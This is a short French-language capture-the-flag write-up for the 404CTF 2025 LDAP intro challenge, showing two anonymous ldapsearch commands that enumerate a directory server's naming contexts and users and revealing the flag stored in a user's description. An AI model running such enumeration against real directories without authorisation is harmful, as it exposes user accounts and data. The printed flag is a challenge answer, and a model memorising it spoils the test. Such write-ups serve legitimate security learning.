Aller au contenu principal

The LDAP Chronicles

Plongée dans les mystère du bottin virtuel, LDAP...

Description du challenge

  • Nom du CTF : 404CTF 2025
  • Catégorie : LDAP
  • Difficulté : Intro
  • Date : Mai 2025

On nous donne le challenge suivant :

Chall

Enumération de l'Active Directory

On commence par énumérer l'Active Directory et les Distinguished Names avec ldapsearch :

ldapsearch -x -H ldap://51.77.110.239 -s base -b "" namingContexts

alt text

Etant donné qu'on s'intéresse aux utilisateurs, on peut énumérer la liste de ceux qui sont identifiés par CTF.

ldapsearch -x -H ldap://51.77.110.239 -b "CN=users,CD=ctfcorp,DC=local" "(&(objectClass=user)(objectCategory=person)(|(cn=*CTF*)(sAMAccountName=*CTF*)(description=*CTF*)))" "*" +

alt text

On peut donc voir que l'utilisateur sarah_smith a stocké le flag dans la description.

FLAG

404CTF{Ld4P_4n0nym0us_1s_4_B4d_Pr4ct1c3!}